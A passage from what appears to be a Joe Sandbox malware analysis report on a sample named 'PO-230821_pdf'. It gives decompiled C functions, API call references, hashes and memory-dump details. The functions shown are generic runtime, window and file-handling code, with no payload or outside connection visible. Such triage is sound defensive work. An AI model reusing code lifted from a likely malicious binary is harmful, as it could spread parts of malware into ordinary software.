					E100040A0(_t155, 0x1000be00, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E100040A0(_t155, 0x1000be00, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x10001ee4
0x10001ee6
0x10001eeb
0x10001ef2
0x10001ef8
0x10001efa
0x10001f03
0x10001f23
0x10001f27
0x10001f28
0x10001f29
0x10001f30
0x10001f32
0x10001f37
0x10001f50
0x10001f55
0x10001f5b
0x10001f64
0x10001f6a
0x10001f6d
0x10001f70
0x10001f79
0x10001f7c
0x10001f82
0x10001f85
0x10001f88
0x10001f8b
0x10001f8e
0x10001f8e
0x10001f99
0x10001fa4
0x100020d3
0x100020d3
0x100020d3
0x100020d9
0x00000000
0x00000000
0x100020e4
0x100020ea
0x100020f0
0x10002105
0x1000210b
0x10002112
0x10002117
0x10002119
0x1000210d
0x1000210f
0x1000210f
0x10002123
0x10002128
0x1000216f
0x10002175
0x10002178
0x1000217e
0x10002185
0x1000218a
0x1000218a
0x00000000
0x1000212e
0x1000212f
0x10002137
0x00000000
0x00000000
0x10002139
0x1000213b
0x10002143
0x10002150
0x1000215b
0x10002160
0x10002164
0x1000216a
0x00000000
0x1000216a
0x10002156
0x10002158
0x10002158
0x00000000
0x10002158
0x10002149
0x00000000
0x10002149
0x100020f7
0x100020fd
0x10002191
0x10002191
0x00000000
0x10002191
0x100020f0
0x10002197
0x1000219e
0x10001f18
0x10001f1a
0x10001f1b
0x10001f20
0x10001f20
0x10001faa
0x10001faf
0x00000000
0x00000000
0x10001fb5
0x10001fb7
0x10001fba
0x10001fbd
0x10001fc2
0x10001fcc
0x10001fce
0x10001fd0
0x10001fd0
0x10001fd5
0x10001fd6
0x10001fd9
0x10001feb
0x10001fed
0x10001ff2
0x10002086
0x1000208d
0x10002093
0x100020a3
0x100020a9
0x100020ac
0x100020af
0x100020b3
0x100020b9
0x100020bc
0x100020bf
0x100020c2
0x100020c2
0x100020c7
0x100020c8
0x100020cb
0x00000000
0x100020cb
0x10001ff8
0x10001ffe
0x00000000
0x10001ffe
0x10002001
0x10002003
0x10002006
0x10002009
0x1000200c
0x10002014
0x10002019
0x10002073
0x10002073
0x10002074
0x1000207a
0x1000207b
0x1000207e
0x10002081
0x00000000
0x10002020
0x10002020
0x10002024
0x00000000
0x00000000
0x10002028
0x10002038
0x10002045
0x1000204c
0x10002051
0x10002058
0x10002060
0x10002064
0x1000206a
0x1000206d
0x10002070
0x10002070
0x00000000
0x10002070
0x1000202b
0x10002031
0x10002036
0x00000000
0x00000000
0x00000000
0x10002036
0x10002019
0x00000000
0x1000200c
0x10001f44
0x10001f4c
0x00000000
0x10001f4c
0x10001f10
0x00000000

APIs

__lock.LIBCMT ref: 10001EF2

Part of subcall function 10002A35: __mtinitlocknum.LIBCMT ref: 10002A47
Part of subcall function 10002A35: __amsg_exit.LIBCMT ref: 10002A53
Part of subcall function 10002A35: EnterCriticalSection.KERNEL32(?,?,10001820,0000000D,10009AF0,00000008,100018F1,?,00000001,?,100014AC,00000000,10009AB0,00000008,10001535,?), ref: 10002A60

@_EH4_CallFilterFunc@8.LIBCMT ref: 10001F10
__calloc_crt.LIBCMT ref: 10001F29
@_EH4_CallFilterFunc@8.LIBCMT ref: 10001F44
GetStartupInfoW.KERNEL32(?,10009B60,00000064), ref: 10001F99
__calloc_crt.LIBCMT ref: 10001FE4
GetFileType.KERNEL32(00000001), ref: 1000202B
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10002064
GetStdHandle.KERNEL32(-000000F6), ref: 1000211D
GetFileType.KERNEL32(00000000), ref: 1000212F
InitializeCriticalSectionAndSpinCount.KERNEL32(-1000DB74,00000FA0), ref: 10002164

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 301580142-0
Opcode ID: 2d8cac80f073dcc9dfd702bfd764e0811f6332412cd4bca8ba009bb46d97c60e
Instruction ID: fcfc70d86479900d935e8ce6fa034a8589cddd1e60d73967d9baabefcea3176b
Opcode Fuzzy Hash: 2d8cac80f073dcc9dfd702bfd764e0811f6332412cd4bca8ba009bb46d97c60e
Instruction Fuzzy Hash: 2491D170D05756CFEB10CF68C88059DBBF4EF093A4B21426ED5A6A729AD7349842CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
SetWindowTextW.USER32(00422728,00422728), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32(Fosklcks,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Fosklcks,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 10007110 Relevance: 13.6, APIs: 9, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10007110(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E10001EA9(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E10006D9D(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x1000db80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E10006D9D(2);
							if(E10006D9D(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E10006D9D(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E10006D17(_t35);
					 *((char*)( *((intOrPtr*)(0x1000db80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10003A46(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x10007113
0x1000711a
0x10007123
0x10007130
0x10007182
0x10007182
0x10007132
0x10007132
0x1000713a
0x10007148
0x00000000
0x00000000
0x00000000
0x00000000
0x10007150
0x10007150
0x10007152
0x10007164
0x00000000
0x10007166
0x10007166
0x10007176
0x00000000
0x10007178
0x1000717e
0x1000717e
0x10007176
0x10007164
0x1000713a
0x10007185
0x1000719d
0x100071a4
0x100071b2
0x100071a6
0x100071ad
0x100071ad
0x100071b7
0x1000711c
0x10007120
0x10007120

APIs

__ioinit.LIBCMT ref: 10007113

Part of subcall function 10001EA9: InitOnceExecuteOnce.KERNEL32(1000BF04,10001EE4,00000000,00000000,100059D6), ref: 10001EB7

__get_osfhandle.LIBCMT ref: 10007127
__get_osfhandle.LIBCMT ref: 10007152
__get_osfhandle.LIBCMT ref: 1000715B
__get_osfhandle.LIBCMT ref: 10007167
CloseHandle.KERNEL32(00000000,?,?,?,100070BB,?,10009D68,00000010,10006BBF,00000000,?,?,?), ref: 1000716E
GetLastError.KERNEL32(?,100070BB,?,10009D68,00000010,10006BBF,00000000,?,?,?), ref: 10007178
__free_osfhnd.LIBCMT ref: 10007185
__dosmaperr.LIBCMT ref: 100071A7

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: ce2959535f6860cfffb36d560c733367f544dfd2515bb58f4928e8f84eb54c83
Instruction ID: 4e5b2bc2a83de6c9835be33e44e299ab5093b7e25435b5d975fa46d8298bb269
Opcode Fuzzy Hash: ce2959535f6860cfffb36d560c733367f544dfd2515bb58f4928e8f84eb54c83
Instruction Fuzzy Hash: 0211E932E0566025F255D77C5C45BAE378BFF417F4F22024AF82C8B1DEDF68A8418161

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
CharNextW.USER32(?,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
CharPrevW.USER32(?,?,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

Strings

*?|<>/":, xrefs: 00406941
C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-432181087
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
